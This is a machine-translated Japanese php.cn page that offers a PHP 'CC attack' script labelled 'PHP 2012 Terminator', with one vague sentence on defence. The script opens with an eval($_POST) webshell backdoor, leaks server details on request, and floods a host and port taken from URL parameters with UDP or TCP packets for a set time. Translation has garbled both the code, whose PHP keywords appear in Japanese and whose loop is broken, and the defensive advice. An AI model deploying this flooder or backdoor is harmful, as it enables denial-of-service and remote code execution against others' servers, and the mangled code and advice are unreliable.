php cc攻撃コード cc攻撃の防止方法
WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
リリース: 2016-07-25 08:54:25
-
- eval($_POST[Chr(90)]);
- set_time_limit(86400);
- ignore_user_abort(True);
- $パケット = 0;
- $http = $_GET['http'];
- $rand = $_GET['終了'];
- $exec_time = $_GET['time'];
- if (StrLen($http)==0 または StrLen($rand)==0 または StrLen($exec_time)==0)
- {
- if(StrLen($_GET['rat'])<>0 )
- {
- echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER ['SERVER_SOFTWARE'].$_GET['rat'];
- 終了;
- }
- エコー「PHP 2012 ターミネーター」;
- 終了;
- }
- for($i=0;$i{
- $out .= "X";
- }
- //Udp1-fsockopen Udp2 pfsockopen Tcp3 CC.center
- $max_time = time()+$exec_time;
- if($rand==53)
- while(1)
- {
- $packets++;
- if(time() > $max_time)
- {
- break;
- }
- $fp = fsockopen("udp://$http", $rand, $errno, $errstr, 5);
- if($fp)
- {
- fwrite($fp, $out);
- fclose($fp);
- }
- }
- else
- if($rand==500)
- while(1)
- {
- $packets++;
- if(time() > $max_time){
- break;
- }
- $fp = pfsockopen("udp://$http", $rand, $errno, $errstr, 5);
- if($fp)
- {
- fwrite($fp, $out);
- fclose($fp);
- }
- }
- else
- while(1)
- {
- $packets++;
- if(time() > $max_time){
- break;
- }
- $fp = pfsockopen("tcp://$http", $rand, $errno, $errstr, 5);
- if($fp)
- {
- fwrite($fp, $out);
- fclose($fp);
- }
- ?>
-
复制コード
CC攻撃の防御策、場合によっては、静的なWebサイトの場合、時間を判断することができ、サーバー上にCC攻撃防御策をインストールする必要があります、一般サーバー安全犬も危険ではありません。
php cc攻撃击の防御、要時刻注意。
|
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
著者別の最新記事
-
2025-02-26 03:58:14
-
2025-02-26 03:38:10
-
2025-02-26 03:17:10
-
2025-02-26 02:49:09
-
2025-02-26 01:08:13
-
2025-02-26 00:46:10
-
2025-02-25 23:42:08
-
2025-02-25 22:50:13
-
2025-02-25 21:54:11
-
2025-02-25 20:45:11
最新の問題
-
2025-03-21 13:39:34
-
2025-03-21 13:38:34
-
2025-03-21 13:37:19
-
2025-03-21 13:35:24
-
2025-03-21 13:34:32